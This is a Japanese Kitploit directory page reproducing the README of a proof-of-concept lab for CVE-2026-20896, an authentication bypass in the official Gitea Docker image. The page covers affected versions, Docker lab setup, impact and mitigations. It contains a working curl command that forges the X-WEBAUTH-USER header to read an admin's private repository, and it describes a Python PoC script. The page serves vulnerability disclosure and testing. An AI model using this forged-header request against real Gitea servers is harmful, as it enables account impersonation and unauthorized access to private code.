Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-20896 — CVE-2026-20896 の概念実証ラボおよび Python/cURL スクリプト。公式 Gitea Docker イメージにおける X-WEBAUTH-USER ヘッダーを介した認証バイパスを実証します。 | Kitploit
ツール/GitHubGitHub/yym8538/cve-2026-20896
コンテナセキュリティ脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト認証ラボと実践
GitHubyym8538/cve-2026-20896

CVE-2026-20896

CVE-2026-20896 の概念実証ラボおよび Python/cURL スクリプト。公式 Gitea Docker イメージにおける X-WEBAUTH-USER ヘッダーを介した認証バイパスを実証します。

リポジトリを見る
11ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-20896: Gitea Dockerイメージ認証バイパスPoC

[!WARNING] このPoCはローカルラボ、または明示的にテストを許可されたシステムに対してのみ使用してください。

https://github.com/user-attachments/assets/b73af2fe-0e59-438b-80d6-be93fd75697b

概要

CVE-2026-20896 は、影響を受ける公式Gitea Dockerイメージにおける認証バイパスです。リバースプロキシ認証が有効な場合、イメージが生成する REVERSE_PROXY_TRUSTED_PROXIES = * 設定により、Giteaバックエンドに到達できるクライアントが X-WEBAUTH-USER ヘッダーを通じて既存ユーザーになりすますことができます。

このラボでは、ランダムなパスワードを持つ gitea-admin という名前の管理者を作成し、プライベートリポジトリ gitea-admin/private-proof に CVE-2026-20896_AUTH_BYPASS_CONFIRMED を保存します。ランダムな管理者パスワードを知らずにそのファイルを読み取ることで、バイパスを実証します。

影響を受けるバージョン

カテゴリバージョン
脆弱公式 gitea/gitea Dockerイメージ ≤ 1.26.2
最初の修正版1.26.3
推奨1.26.4 以降

脆弱な構成では、リバースプロキシ認証が有効であり、Giteaバックエンドに直接到達できるか、上流プロキシが攻撃者から提供されたIDヘッダーを保持している必要があります。このローカル再現にはリバースプロキシコンテナは不要です。

環境

# build
docker build -t cve-2026-20896-gitea-vuln .

# run
docker run -d --rm --name cve-2026-20896-gitea-vuln -p 127.0.0.1:3000:3000 cve-2026-20896-gitea-vuln

Giteaとプライベートプルーフリポジトリが初期化されるまで数秒待ちます。

PoC

cURL

curl -s -L -H "X-WEBAUTH-USER: gitea-admin" http://127.0.0.1:3000/gitea-admin/private-proof/raw/branch/main/proof.txt

悪用に成功すると CVE-2026-20896_AUTH_BYPASS_CONFIRMED が返されます。

Python

python poc.py http://127.0.0.1:3000

このスクリプトは、未認証、非管理者、および偽造された管理者リクエストを比較し、認可バイパスが確認された場合に VULNERABLE を出力します。Python 3.10以降が必要で、標準ライブラリのみを使用します。

影響

  • 既知または推測可能なGiteaユーザーへのなりすまし
  • プライベートリポジトリおよびユーザーリソースへの不正アクセス
  • 管理者アカウントになりすました場合の管理操作

緩和策

  • Gitea 1.26.3以降にアップグレードしてください。1.26.4以降を推奨します。
  • REVERSE_PROXY_TRUSTED_PROXIES を信頼できるプロキシアドレスに制限してください。
  • Giteaバックエンドへの直接アクセスを防ぎ、外部から提供されたIDヘッダーを上書きしてください。
  • 不要な場合はリバースプロキシ認証を無効にしてください。

クリーンアップ

docker stop cve-2026-20896-gitea-vuln

参考資料

  • Gitea Security Advisory GHSA-f75j-4cw6-rmx4
  • Gitea 1.26.3 and 1.26.4 release announcement
  • Gitea security fix PR #38151
ツールをダウンロード